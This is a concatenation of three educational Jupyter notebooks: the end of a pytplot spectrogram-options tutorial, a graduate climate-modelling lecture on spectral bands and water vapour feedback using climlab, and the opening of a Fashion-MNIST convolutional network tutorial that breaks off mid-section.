# + id="7ZwtSp57ARxn"
options('data', 'zlog', True)
# + [markdown] id="Cfu1Qfl3VhrE"
# Note: for some reason, we need to change the `zrange` to remove the 0 in the log scale
# + id="jVSJKLx3AVmJ"
options('data', 'zrange', [0.0001, 24])
options('data', 'yrange', [10, 50])
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="_w7V9tEyAeWn" outputId="a0f0b2cf-19c1-42ee-8328-7e1df8accf48"
tplot('data')
# + [markdown] id="zAFJiJUfXV-n"
# Change the opacity using the `alpha` option
# + id="IkO_Tox2Ae3Y"
options('data', 'alpha', 0.5)
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="6Wdo6-iQBK8-" outputId="63af8c1b-5ab8-4768-bd27-4f80ce37c21e"
tplot('data')
# + [markdown] id="U4bUrIAjXc2b"
# Create a simple line variable with 5 data points at 30.0
# + colab={"base_uri": "https://localhost:8080/"} id="rCbh8cr9BLo3" outputId="786f6129-6457-45eb-bc15-f8755c12bf15"
store_data('line', data={'x': [1, 2, 3, 4, 5], 'y': [30]*5})
# + [markdown] id="iTOPlAJgXhUl"
# Create a pseudo variable combining the spectrogram and the line
# + colab={"base_uri": "https://localhost:8080/"} id="K3ADyJppBWY2" outputId="a73c7d15-f454-44de-f3d8-21e295fe694d"
store_data('combined', data='data line')
# + [markdown] id="aeqh4J4nXriS"
# Turn the y/z logs back to linear, and set the alpha back to 1
# + id="4yGjZLEYBblV"
options('data', 'zlog', False)
options('data', 'ylog', False)
options('data', 'alpha', 1)
# + [markdown] id="4GTKLfY6XwPA"
# Plot the combined variable
# + colab={"base_uri": "https://localhost:8080/", "height": 612} id="ONrXwDvjBoa9" outputId="45c4c030-982e-4643-f3da-d40f5ccee89c"
tplot('combined')
# + [markdown] id="aUZaG3xSXyMK"
# Increase the margin size on the right-side of the panel
# + id="e-_whtjWBpLB"
from pytplot import tplot_options
tplot_options('xmargin', [0.1, 0.25])
# + colab={"base_uri": "https://localhost:8080/", "height": 612} id="mjpEHXKWB85L" outputId="eb1017e2-44f8-4c85-d549-92308dd78fdb"
tplot('combined')
# + [markdown] id="GOi0nLcCX2nZ"
# By default, both the spectra and the lines share the y-axis. To move the line plot to the right axis, set the `right_axis` option
# + id="9N4SmCHoB91j"
options('combined', 'right_axis', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="bddSBJ3-CEaa" outputId="236f9457-e16b-48dc-e604-c81e1acc6869"
tplot('combined')
# + [markdown] id="gPPHMJ_PYJg6"
# All of the standard options should work, e.g., to add + markers at the data locations:
# + id="t7G-R5ECCFwZ"
options('line', 'marker', '+')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="VIugOCT1CYco" outputId="115372e2-3d69-4b7f-c54f-154db7a7d3ab"
tplot('combined')
# + [markdown] id="gUXED2JIYPuL"
# And you can update the yrange of the line:
# + id="dPreZjN1CZNx"
options('line', 'yrange', [29, 31])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="0bUQTFevCf0j" outputId="af7d98c4-0922-48c9-e171-44560c4b2f5c"
tplot('combined')
# + [markdown] id="GFGuu9zvYSyS"
# Add a legend to the line:
# + id="G2u1FDzeCgzH"
options('line', 'legend_names', 'Line')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="4yR1n7aTCnXP" outputId="ffcf48a3-aea2-407b-a148-1e399b678127"
tplot('combined')
# + [markdown] id="mZpltUtdYU_y"
# Set the title of the color bar:
# + id="yQh9z_DpCoNw"
options('data', 'ztitle', 'Colorbar title')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="g5Ri9qOFC1Ho" outputId="8d6b5ca0-f0b6-43f0-bf20-086d057cb01f"
tplot('combined')
# + [markdown] id="93RJ5dKiYW3a"
# Set the z-axis subtitle:
# + id="E8iqcr4GC2h4"
options('data', 'zsubtitle', '[colorbar units]')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="onDCRCzTC7_1" outputId="2dcef482-7964-4703-ef03-cf263da1eb60"
tplot('combined')
# + id="gcl665CQTsz_"
|
pyspedas_examples/notebooks/PyTplot_spectrogram_options.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] slideshow={"slide_type": "slide"}
# # [ATM 623: Climate Modeling](../index.ipynb)
#
# [<NAME>](http://www.atmos.albany.edu/facstaff/brose/index.html), University at Albany
#
# # Lecture 9: Who needs spectral bands? We do. Some baby steps...
# + [markdown] slideshow={"slide_type": "skip"}
# ### About these notes:
#
# This document uses the interactive [`Jupyter notebook`](https://jupyter.org) format. The notes can be accessed in several different ways:
#
# - The interactive notebooks are hosted on `github` at https://github.com/brian-rose/ClimateModeling_courseware
# - The latest versions can be viewed as static web pages [rendered on nbviewer](http://nbviewer.ipython.org/github/brian-rose/ClimateModeling_courseware/blob/master/index.ipynb)
# - A complete snapshot of the notes as of May 2017 (end of spring semester) are [available on Brian's website](http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2017/Notes/index.html).
#
# [Also here is a legacy version from 2015](http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2015/Notes/index.html).
#
# Many of these notes make use of the `climlab` package, available at https://github.com/brian-rose/climlab
# -
# Ensure compatibility with Python 2 and 3
from __future__ import print_function, division
# + [markdown] slideshow={"slide_type": "slide"}
# ## Contents
#
# 1. [What if CO$_2$ actually behaved like a Grey Gas?](#section1)
# 2. [Another look at observed spectra](#section2)
# 3. [Water vapor changes under global warming](#section3)
# 4. [A simple water vapor parameterization](#section4)
# 5. [Modeling spectral bands with the `climlab.BandRCModel` process](#section5)
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section1'></a>
#
# ## 1. What if CO$_2$ actually behaved like a Grey Gas?
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# Suppose that CO$_2$ actually behaved as a grey gas. In other words, no spectral dependence in absorptivity.
#
# If we then **double the CO2 concentration** in the atmosphere, we double the number of absorbers. This should imply that we also **double the absorption cross-section**:
#
# $$ \kappa^\prime = 2 ~ \kappa $$
# + [markdown] slideshow={"slide_type": "slide"}
# This would imply that we **double the optical thickness of every layer**:
#
# $$ \Delta \tau^\prime = 2 \left( -\frac{\kappa}{g} \Delta p \right) = 2 ~ \Delta \tau$$
# + [markdown] slideshow={"slide_type": "slide"}
# And since (from [Lecture 8](./Lecture08 -- Modeling non-scattering radiative transfer.ipynb)) the absorptivity / emissivity of each layer is
#
# $$ \epsilon = 1 - \exp\big( - \Delta \tau \big) $$
#
# the **modified absorptivity** is
#
# $$ \epsilon^\prime = 1 - \exp\big( - 2\Delta \tau \big) = 1 - \left( \exp\big( - \Delta \tau \big)\right)^2 = 1 - (1-\epsilon)^2 $$
# or simply
# $$ \epsilon^\prime = 2 \epsilon - \epsilon^2 $$
#
# (Note that $\epsilon^\prime = 2 \epsilon$ for very thin layers, for which $\epsilon$ is small).
# + [markdown] slideshow={"slide_type": "slide"}
# ### What does our 2-layer analytical model then say about the radiative forcing?
#
# Recall that we tuned the two-layer model with
#
# $$ \epsilon = 0.586 $$
#
# to get the observed OLR with observed temperatures.
# + slideshow={"slide_type": "slide"}
# Applying the above formula
eps = 0.586
print( 'Doubling a grey gas absorber would \
change the absorptivity from {:.3} \
to {:.3}'.format(eps, 2*eps - eps**2))
# + [markdown] slideshow={"slide_type": "-"}
# **If CO2 behaved like a grey gas**, doubling it would cause a huge increase in the absorptivity of each layer!
# + [markdown] slideshow={"slide_type": "slide"}
# Back in [Lecture 6]('Lecture06 -- Elementary greenhouse models.ipynb') we worked out that the radiative forcing in this model (with the observed lapse rate) is about +2.2 W m$^{-2}$ for an increase of 0.01 in $\epsilon$.
#
# **This means that our hypothetical doubling of "grey CO$_2$" should yield a radiative forcing of 53.5 W m$^{-2}$.**
#
# This is an absolutely enormous number. Assuming a net climate feedback of -1.3 W m$^{-2}$ K$^{-1}$
# (consistent with the AR5 ensemble)
# would then give us an **equilibrium climate sensitivity of 41 K**.
# + [markdown] slideshow={"slide_type": "slide"}
# ### Conclusions:
#
# 1. **If CO2 did behave like a grey gas, we would be toast.**
# 2. The Grey Gas model is insufficient for understanding radiative forcing and feedback.
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section2'></a>
#
# ## 2. Another look at observed spectra
# ____________
#
# It's time to move away from the Grey Gas approximation and look more carefully at the actual observed spectra of solar and terrestrial radiation.
# + [markdown] slideshow={"slide_type": "slide"}
# ### Observed solar spectra
#
# The following figure shows observed spectra of solar radiation at TOA and at the surface, along with the theoretical Planck function for a blackbody at 5525 K.
# + slideshow={"slide_type": "slide"}
from IPython.display import Image
Image('../images/Solar_spectrum.png')
# + [markdown] slideshow={"slide_type": "slide"}
# > This figure shows the solar radiation spectrum for direct light at both the top of the Earth's atmosphere and at sea level. The sun produces light with a distribution similar to what would be expected from a 5525 K (5250 °C) blackbody, which is approximately the sun's surface temperature. As light passes through the atmosphere, some is absorbed by gases with specific absorption bands. Additional light is redistributed by Raleigh scattering, which is responsible for the atmosphere's blue color. These curves are based on the American Society for Testing and Materials (ASTM) Terrestrial Reference Spectra, which are standards adopted by the photovoltaics industry to ensure consistent test conditions and are similar to the light that could be expected in North America. Regions for ultraviolet, visible and infrared light are indicated.
#
# Source: http://commons.wikimedia.org/wiki/File:Solar_spectrum_en.svg
# + [markdown] slideshow={"slide_type": "slide"}
# - The figure shows that that the incident beam at TOA has the shape of a blackbody radiator.
# - By the time the beam arrives at the surface, it is strongly depleted at specific wavelengths.
# - Absorption by O$_3$ (ozone) depletes almost the entire ultraviolet spectrum.
# - Weaker absorption features, mostly due to H$_2$O, deplete some parts of the near-infrared.
# - Note that the depletion in the visible band is mostly due to scattering, which depletes the direct beam but contributes diffuse radiation (so we can still see when it's cloudy!)
# + [markdown] slideshow={"slide_type": "slide"}
# ### Observed terrestrial spectra
#
# This figure shows the Planck function for Earth's surface temperature compared with the spectrum observed from space.
# + slideshow={"slide_type": "slide"}
Image('../images/Terrestrial_spectrum.png')
# -
# Source: https://www.e-education.psu.edu/earth103/node/671
# + [markdown] slideshow={"slide_type": "slide"}
# Careful: I'm pretty sure what is plotted here is not the **total** observed spectrum, but rather the part of the **emissions from the surface** that **actual make it out to space**.
#
# As we now, the terrestrial beam from the surface is depleted by absorption by many greenhouse gases, but principally CO$_2$ and H$_2$O.
#
# However there is a spectral band centered on 10 $\mu$m in which the greenhouse effect is very weak. This is the so-called **window region** in the spectrum.
#
# Since absorption is so strong across most of the rest of the infrared spectrum, this window region is a key determinant of the overall greenhouse effect.
# + [markdown] slideshow={"slide_type": "slide"}
# #### One very big shortcoming of the Grey Gas model: it ignores the window region
#
# We would therefore like to start using a model that includes enough spectral information that it represents
#
# - the mostly strong CO2 absorption outside the window region
# - the weak absorption inside the window region
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section3'></a>
#
# ## 3. Water vapor changes under global warming
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# Another big shortcoming of the Grey Gas model is that it cannot represent the **water vapor feedback**.
#
# We have seen above that H$_2$O is an important absorber in both longwave and shortwave spectra.
#
# We also know that the water vapor load in the atmosphere increases as the climate warms. The primary reason is that the **saturation vapor pressure** increases strongly with temperature.
# + [markdown] slideshow={"slide_type": "slide"}
# ### Evidence from CESM simulations
#
# Let's take at changes in the mean water vapor fields in the CESM model after a doubling of CO$_2$
# + slideshow={"slide_type": "-"}
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import xarray as xr
from xarray.ufuncs import cos, deg2rad, log
# Disable interactive plotting (use explicit display calls to show figures)
plt.ioff()
# -
# Open handles to the data files
datapath = "http://ramadda.atmos.albany.edu:8080/repository/opendap/latest/Top/Users/BrianRose/CESM_runs/"
endstr = "/entry.das"
ctrl = xr.open_dataset(datapath + 'som_control/som_control.cam.h0.clim.nc' + endstr, decode_times=False)
co2 = xr.open_dataset(datapath + 'som_2xCO2/som_2xCO2.cam.h0.clim.nc' + endstr, decode_times=False)
# + slideshow={"slide_type": "-"}
# Plot cross-sections of the following anomalies under 2xCO2:
# - Temperature
# - Specific humidity
# - Relative humidity
fig, axes = plt.subplots(1,3, figsize=(16,6))
ax = axes[0]
CS = ax.contourf(ctrl.lat, ctrl.lev, (co2['T'] - ctrl['T']).mean(dim=('time','lon')),
levels=np.arange(-11,12,1), cmap=plt.cm.seismic)
ax.set_title('Temperature (K)')
fig.colorbar(CS, orientation='horizontal', ax=ax)
ax = axes[1]
CS = ax.contourf(ctrl.lat, ctrl.lev, (co2['Q'] - ctrl['Q']).mean(dim=('time','lon'))*1000,
levels=np.arange(-3,3.25,0.25), cmap=plt.cm.seismic)
ax.set_title('Specific humidity (g/kg)')
fig.colorbar(CS, orientation='horizontal', ax=ax)
ax = axes[2]
CS = ax.contourf(ctrl.lat, ctrl.lev, (co2['RELHUM'] - ctrl['RELHUM']).mean(dim=('time','lon')),
levels=np.arange(-11,12,1), cmap=plt.cm.seismic)
ax.set_title('Relative humidity (%)')
fig.colorbar(CS, orientation='horizontal', ax=ax)
for ax in axes:
ax.invert_yaxis()
ax.set_xticks([-90, -60, -30, 0, 30, 60, 90]);
ax.set_xlabel('Latitude')
ax.set_ylabel('Pressure')
fig.suptitle('Anomalies for 2xCO2 in CESM slab ocean simulations', fontsize=16);
# + slideshow={"slide_type": "slide"}
fig
# + [markdown] slideshow={"slide_type": "slide"}
# ### What do you see here?
#
# - Where does the largest warming occur?
# - Where does the largest moistening occur?
# + [markdown] slideshow={"slide_type": "slide"}
# In fact the specific humidity anomaly has roughly the same shape of the specific humidity field itself -- **it is largest where the temperature is highest**. This is a consequence of the Clausius-Clapeyron relation.
#
# The **relative humidity** anomaly is
#
# - overall rather small (just a few percent)
# - Largest in places cold places where the specific humidity is very small.
# + [markdown] slideshow={"slide_type": "slide"}
# The smallness of the relative humidity change is a rather remarkable result.
#
# This is not something we can derive from first principles. It is an emergent property of the GCMs. However it is a very robust feature of global warming simulations.
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section4'></a>
#
# ## 4. A simple water vapor parameterization
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# ### A credible climate model needs a water vapor feedback
#
# If relative humidity is nearly constant under global warming, and water vapor is a greenhouse gas, this implies a positive feedback that will amplify the warming for a given radiative forcing.
#
# Thus far our simple models have ignored this process, and we have not been able to use them to assess the climate sensitivity.
# + [markdown] slideshow={"slide_type": "slide"}
# To proceed towards more realistic models, we have two options:
#
# - **Simulate** all the evaporation, condensation and transport processes that determine the time-mean water vapor field (as is done in the CESM).
# - **Parameterize** the dependence of water vapor on temperature by insisting that relative humidity stays constant as the climate changes.
#
# We will now explore this second option, so that we can continue to think of the global energy budget under climate change as a process occurring in a single column.
# + [markdown] slideshow={"slide_type": "slide"}
# ### Manabe's constant relative humidity parameterization
#
# We are going to adopt a parameterization first used in a very famous paper:
#
# > <NAME>. and <NAME>. (1967). Thermal equilibrium of the atmosphere with a given distribution of relative humidity. J. Atmos. Sci., 24(3):241–259.
#
# This paper was the first to give a really credible calculation of climate sensitivity to a doubling of CO2 by accounting for the known spectral properties of CO2 and H2O absorption, as well as the water vapor feedback!
# + [markdown] slideshow={"slide_type": "slide"}
# The parameterization is very simple:
#
# We assume that the relative humidity $r$ is a linear function of pressure $p$:
#
# $$ r = r_s \left( \frac{p/p_s - 0.02}{1 - 0.02} \right) $$
#
# where $p_s = 1000$ hPa is the surface pressure, and $r_s$ is a prescribed surface value of relative humidity. Manabe and Wetherald set $r_s = 0.77$, but we should consider this a tunable parameter in our parameterization.
# + [markdown] slideshow={"slide_type": "slide"}
# Since this formula gives a negative number above 20 hPa, we also assume that the **specific humidity** has a minimum value of $0.005$ g/kg (a typical stratospheric value).
#
# This formula is implemented in `climlab.radiation.ManabeWaterVapor()`
#
# Using this parameterization, the surface and tropospheric specific humidity will always increase as the temperature increases.
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section5'></a>
#
# ## 5. Modeling spectral bands with the `climlab.BandRCModel` process
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# Here is a brief introduction to the `climlab.BandRCModel` process.
#
# This is a model that divides the spectrum into 7 distinct bands: three shortwave and four longwave.
#
# As we will see, the process works much like the familiar `climlab.RadiativeConvectiveModel`.
# + [markdown] slideshow={"slide_type": "slide"}
# ## About the spectra
#
# ### Shortwave
#
# The shortwave is divided into three channels:
#
# - Channel 0 is the Hartley and Huggins band (extreme UV, 200 - 340 nm, 1% of total flux, strong ozone absorption)
# - Channel 1 is Chappuis band (450 - 800 nm, 27% of total flux, moderate ozone absorption)
# - Channel 2 is remaining radiation (72% of total flux, largely in the visible range, no ozone absorption)
#
#
#
# + [markdown] slideshow={"slide_type": "slide"}
# ### Longwave
#
# The longwave is divided into four bands:
#
# - Band 0 is the **window region** (between 8.5 and 11 $\mu$m), 17% of total flux.
# - Band 1 is the CO2 absorption channel (the band of strong absorption by CO2 around 15 $\mu$m), 15% of total flux
# - Band 2 is a weak water vapor absorption channel, 35% of total flux
# - Band 3 is a strong water vapor absorption channel, 33% of total flux
#
# The longwave decomposition is not as easily related to specific wavelengths, as in reality there is a lot of overlap between H$_2$O and CO$_2$ absorption features (as well as absorption by other greenhouse gases such as CH$_4$ and N$_2$O that we are not representing).
# + [markdown] slideshow={"slide_type": "slide"}
# ### Example usage of the spectral model
# -
import climlab
from climlab import constants as const
# First try a model with all default parameters. Usage is very similar to the familiar `RadiativeConvectiveModel`.
col1 = climlab.BandRCModel()
print( col1)
# + [markdown] slideshow={"slide_type": "slide"}
# Check out the list of subprocesses.
#
# We now have a process called `H2O`, in addition to things we've seen before.
#
# The state variables are still just temperatures:
# -
col1.state
# + [markdown] slideshow={"slide_type": "slide"}
# But the model has a new input field for specific humidity:
# -
col1.q
# + [markdown] slideshow={"slide_type": "slide"}
# The `H2O` process sets the specific humidity field at every timestep to a specified profile, determined by air temperatures. More on that below. For now, let's compute a radiative equilibrium state.
# -
col1.integrate_years(2)
# Check for energy balance
col1.ASR - col1.OLR
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( col1.Tatm, col1.lev, 'c-', label='default' )
ax.plot( col1.Ts, climlab.constants.ps, 'co', markersize=16 )
ax.invert_yaxis()
ax.set_xlabel('Temperature (K)', fontsize=16)
ax.set_ylabel('Pressure (hPa)', fontsize=16 )
ax.set_title('Temperature profiles', fontsize = 18)
ax.grid()
fig
# + [markdown] slideshow={"slide_type": "slide"}
# By default this model has convective adjustment. We can set the adjusted lapse rate by passing a parameter when we create the model.
#
# The model currently has no ozone (so there is no stratosphere). Not very realistic!
#
# + [markdown] slideshow={"slide_type": "slide"}
# ### About the radiatively active gases
# -
# The Band model is aware of three different absorbing gases: O3 (ozone), CO2, and H2O (water vapor). The abundances of these gases are stored in a dictionary of arrays as follows:
col1.absorber_vmr
# + [markdown] slideshow={"slide_type": "slide"}
# Ozone and CO2 are both specified in the model. The default, as you see above, is zero ozone, and constant (well-mixed) CO2 at a volume mixing ratio of 3.8E-4 or 380 ppm.
# + [markdown] slideshow={"slide_type": "slide"}
# Water vapor is handled differently: it is determined by the model at each timestep. We make the following assumptions, following a classic paper on radiative-convective equilibrium by Manabe and Wetherald (J. Atmos. Sci. 1967):
#
# - the relative humidity just above the surface is fixed at 77% (can be changed of course... see the parameter `col1.relative_humidity`
# - water vapor drops off linearly with pressure
# - there is a small specified amount of water vapor in the stratosphere.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Putting in some ozone
# -
# We need to provide some ozone data to the model in order to simulate a stratosphere. We will read in some ozone data just as we did in [Lecture 7](Lecture07 -- Grey radiation modeling with climlab.ipynb).
ozone = xr.open_dataset( datapath + 'som_input/ozone_1.9x2.5_L26_2000clim_c091112.nc' + endstr )
# + slideshow={"slide_type": "slide"}
# Take global, annual average and convert to Kelvin
weight_ozone = cos(deg2rad(ozone.lat)) / cos(deg2rad(ozone.lat)).mean(dim='lat')
O3_global = (ozone.O3 * weight_ozone).mean(dim=('lat','lon','time'))
print(O3_global)
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( O3_global*1E6, ozone.lev)
ax.invert_yaxis()
ax.set_xlabel('Ozone (ppm)', fontsize=16)
ax.set_ylabel('Pressure (hPa)', fontsize=16 )
ax.set_title('Global, annual mean ozone concentration', fontsize = 16);
fig
# + [markdown] slideshow={"slide_type": "slide"}
# We are going to create another instance of the model, this time using the same vertical coordinates as the ozone data.
# -
# Create the column with appropriate vertical coordinate, surface albedo and convective adjustment
col2 = climlab.BandRCModel(lev=ozone.lev)
print( col2)
# + slideshow={"slide_type": "slide"}
# Set the ozone mixing ratio
col2.absorber_vmr['O3'] = O3_global.values
# -
# Run the model out to equilibrium!
col2.integrate_years(2.)
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( col1.Tatm, np.log(col1.lev/1000), 'c-', label='RCE' )
ax.plot( col1.Ts, 0, 'co', markersize=16 )
ax.plot(col2.Tatm, np.log(col2.lev/1000), 'r-', label='RCE O3' )
ax.plot(col2.Ts, 0, 'ro', markersize=16 )
ax.invert_yaxis()
ax.set_xlabel('Temperature (K)', fontsize=16)
ax.set_ylabel('log(Pressure)', fontsize=16 )
ax.set_title('Temperature profiles', fontsize = 18)
ax.grid(); ax.legend()
fig
# + [markdown] slideshow={"slide_type": "slide"}
# Once we include ozone we get a well-defined stratosphere.
#
# Things to consider / try:
#
# - Here we used the global annual mean Q = 341.3 W m$^{-2}$. We might want to consider latitudinal or seasonal variations in Q.
# - We also used the global annual mean ozone profile! Ozone varies tremendously in latitude and by season. That information is all contained in the ozone data file we opened above. We might explore the effects of those variations.
# - We can calculate climate sensitivity in this model by doubling the CO2 concentration and re-running out to the new equilibrium. Does the amount of ozone affect the climate sensitivity? (example below)
# - An important shortcoming of the model: there are no clouds! (that would be the next step in the hierarchy of column models)
# - Clouds would act both in the shortwave (increasing the albedo, cooling the climate) and in the longwave (greenhouse effect, warming the climate). Which effect is stronger depends on the vertical structure of the clouds (high or low clouds) and their optical properties (e.g. thin cirrus clouds are nearly transparent to solar radiation but are good longwave absorbers).
# + slideshow={"slide_type": "slide"}
col3 = climlab.process_like(col2)
print( col3)
# -
# Let's double CO2.
col3.absorber_vmr['CO2'] *= 2.
col3.compute_diagnostics()
print( 'The radiative forcing for doubling CO2 is %f W/m2.' % (col2.diagnostics['OLR'] - col3.diagnostics['OLR']))
# + slideshow={"slide_type": "slide"}
col3.integrate_years(3)
# -
col3.ASR - col3.OLR
print( 'The Equilibrium Climate Sensitivity is %f K.' % (col3.Ts - col2.Ts))
# + slideshow={"slide_type": "slide"}
# An example with no ozone
col4 = climlab.process_like(col1)
print( col4)
# -
col4.absorber_vmr['CO2'] *= 2.
col4.compute_diagnostics()
print( 'The radiative forcing for doubling CO2 is %f W/m2.' % (col1.OLR - col4.OLR))
# + slideshow={"slide_type": "slide"}
col4.integrate_years(3.)
col4.ASR - col4.OLR
# -
print( 'The Equilibrium Climate Sensitivity is %f K.' % (col4.Ts - col1.Ts))
# Interesting that the model is MORE sensitive when ozone is set to zero.
# + [markdown] slideshow={"slide_type": "skip"}
# <div class="alert alert-success">
# [Back to ATM 623 notebook home](../index.ipynb)
# </div>
# + [markdown] slideshow={"slide_type": "skip"}
# ____________
# ## Version information
# ____________
#
#
# + slideshow={"slide_type": "skip"}
# %load_ext version_information
# %version_information numpy, matplotlib, xarray, climlab
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
#
# ## Credits
#
# The author of this notebook is [<NAME>](http://www.atmos.albany.edu/facstaff/brose/index.html), University at Albany.
#
# It was developed in support of [ATM 623: Climate Modeling](http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2015/), a graduate-level course in the [Department of Atmospheric and Envionmental Sciences](http://www.albany.edu/atmos/index.php)
#
# Development of these notes and the [climlab software](https://github.com/brian-rose/climlab) is partially supported by the National Science Foundation under award AGS-1455071 to <NAME>. Any opinions, findings, conclusions or recommendations expressed here are mine and do not necessarily reflect the views of the National Science Foundation.
# ____________
# + slideshow={"slide_type": "skip"}
|
Lectures/Lecture09 -- Who needs spectral bands.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fashion MNIST Clothing Classification
# Model Evaluation Methodology
# How to Develop a Baseline Model
# How to Develop an Improved Model
# How to Finalize the Model and Make Predictions
# Want Results with Deep Learning for Computer Vision?
# Take my free 7-day email crash course now (with sample code).
#
# Click to sign-up and also get a free PDF Ebook version of the course.
#
# Download Your FREE Mini-Course
# Fashion MNIST Clothing Classification
# The Fashion-MNIST dataset is proposed as a more challenging replacement dataset for the MNIST dataset.
#
# It is a dataset comprised of 60,000 small square 28×28 pixel grayscale images of items of 10 types of clothing, such as shoes, t-shirts, dresses, and more. The mapping of all 0-9 integers to class labels is listed below.
#
# 0: T-shirt/top
# 1: Trouser
# 2: Pullover
# 3: Dress
# 4: Coat
# 5: Sandal
# 6: Shirt
# 7: Sneaker
# 8: Bag
# 9: Ankle boot
# It is a more challenging classification problem than MNIST and top results are achieved by deep learning convolutional neural networks with a classification accuracy of about 90% to 95% on the hold out test dataset.
#
# The example below loads the Fashion-MNIST dataset using the Keras API and creates a plot of the first nine images in the training dataset.
# example of loading the fashion mnist dataset
from matplotlib import pyplot
from keras.datasets import fashion_mnist
# load dataset
(trainX, trainy), (testX, testy) = fashion_mnist.load_data()
# summarize loaded dataset
print('Train: X=%s, y=%s' % (trainX.shape, trainy.shape))
print('Test: X=%s, y=%s' % (testX.shape, testy.shape))
# plot first few images
for i in range(9):
# define subplot
pyplot.subplot(330 + 1 + i)
# plot raw pixel data
pyplot.imshow(trainX[i], cmap=pyplot.get_cmap('gray'))
# show the figure
pyplot.show()
# Running the example loads the Fashion-MNIST train and test dataset and prints their shape.
#
# We can see that there are 60,000 examples in the training dataset and 10,000 in the test dataset and that images are indeed square with 28×28 pixels.
#
# A plot of the first nine images in the dataset is also created showing that indeed the images are grayscale photographs of items of clothing.
# # Model Evaluation Methodology
# The Fashion MNIST dataset was developed as a response to the wide use of the MNIST dataset, that has been effectively “solved” given the use of modern convolutional neural networks.
#
# Fashion-MNIST was proposed to be a replacement for MNIST, and although it has not been solved, it is possible to routinely achieve error rates of 10% or less. Like MNIST, it can be a useful starting point for developing and practicing a methodology for solving image classification using convolutional neural networks.
#
# Instead of reviewing the literature on well-performing models on the dataset, we can develop a new model from scratch.
#
# The dataset already has a well-defined train and test dataset that we can use.
#
# In order to estimate the performance of a model for a given training run, we can further split the training set into a train and validation dataset. Performance on the train and validation dataset over each run can then be plotted to provide learning curves and insight into how well a model is learning the problem.
#
# The Keras API supports this by specifying the “validation_data” argument to the model.fit() function when training the model, that will, in turn, return an object that describes model performance for the chosen loss and metrics on each training epoch.
#
# In order to estimate the performance of a model on the problem in general, we can use k-fold cross-validation, perhaps 5-fold cross-validation. This will give some account of the model’s variance with both respect to differences in the training and test datasets and the stochastic nature of the learning algorithm. The performance of a model can be taken as the mean performance across k-folds, given with the standard deviation, that could be used to estimate a confidence interval if desired.
#
# We can use the KFold class from the scikit-learn API to implement the k-fold cross-validation evaluation of a given neural network model. There are many ways to achieve this, although we can choose a flexible approach where the KFold is only used to specify the row indexes used for each split.
# load dataset
(trainX, trainY), (testX, testY) = fashion_mnist.load_data()
# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))
from keras.utils.np_utils import to_categorical
# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)
# load train and test dataset
def load_dataset():
# load dataset
(trainX, trainY), (testX, testY) = fashion_mnist.load_data()
# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))
# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)
return trainX, trainY, testX, testY
# # Prepare Pixel Data
# We know that the pixel values for each image in the dataset are unsigned integers in the range between black and white, or 0 and 255.
#
# We do not know the best way to scale the pixel values for modeling, but we know that some scaling will be required.
#
# A good starting point is to normalize the pixel values of grayscale images, e.g. rescale them to the range [0,1]. This involves first converting the data type from unsigned integers to floats, then dividing the pixel values by the maximum value.
# convert from integers to floats
train_norm = trainX.astype('float32')
test_norm = testX.astype('float32')
# normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
# scale pixels
def prep_pixels(train, test):
# convert from integers to floats
train_norm = train.astype('float32')
test_norm = test.astype('float32')
# normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
# return normalized images
return train_norm, test_norm
# # Define Model
# Next, we need to define a baseline convolutional neural network model for the problem.
#
# The model has two main aspects: the feature extraction front end comprised of convolutional and pooling layers, and the classifier backend that will make a prediction.
#
# For the convolutional front-end, we can start with a single convolutional layer with a small filter size (3,3) and a modest number of filters (32) followed by a max pooling layer. The filter maps can then be flattened to provide features to the classifier.
#
# Given that the problem is a multi-class classification, we know that we will require an output layer with 10 nodes in order to predict the probability distribution of an image belonging to each of the 10 classes. This will also require the use of a softmax activation function. Between the feature extractor and the output layer, we can add a dense layer to interpret the features, in this case with 100 nodes.
#
# All layers will use the ReLU activation function and the He weight initialization scheme, both best practices.
#
